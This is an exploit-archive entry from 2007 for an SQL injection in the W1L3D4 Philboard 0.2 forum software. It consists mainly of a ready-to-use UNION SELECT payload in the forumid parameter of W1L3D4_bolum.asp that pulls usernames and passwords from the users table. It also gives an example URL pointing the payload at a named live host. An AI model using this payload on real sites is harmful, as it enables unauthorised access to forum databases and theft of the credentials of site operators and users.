W1L3D4 Philboard 0.2 (W1L3D4_bolum.asp forumid) SQL Injection Vuln

2007-05-11T00:00:00
ID 1337DAY-ID-1863
Type zdt
Reporter gsy
Modified 2007-05-11T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==================================================================
W1L3D4 Philboard 0.2 (W1L3D4_bolum.asp forumid) SQL Injection Vuln
==================================================================



Discovered by: gsy & kerem125

script download:http://www.aspindir.com/indir2.asp?id=4891&sIslem=%DDndir

exploit:/W1L3D4_bolum.asp?forumid=-99+union+all+select+0,1,2,3,4,5,6,7,8,9,password,username,12,13,14,15,16,17,18,19,20+from+users

example:http://philboard.somee.com/W1L3D4_bolum.asp?forumid=-99+union+all+select+0,1,2,3,4,5,6,7,8,9,password,username,12,13,14,15,16,17,18,19,20+from+users

Special thx to:by_emr3 , ercu_145, bolivar, voltigore, mardinli, f10



#  0day.today [2018-01-02]  #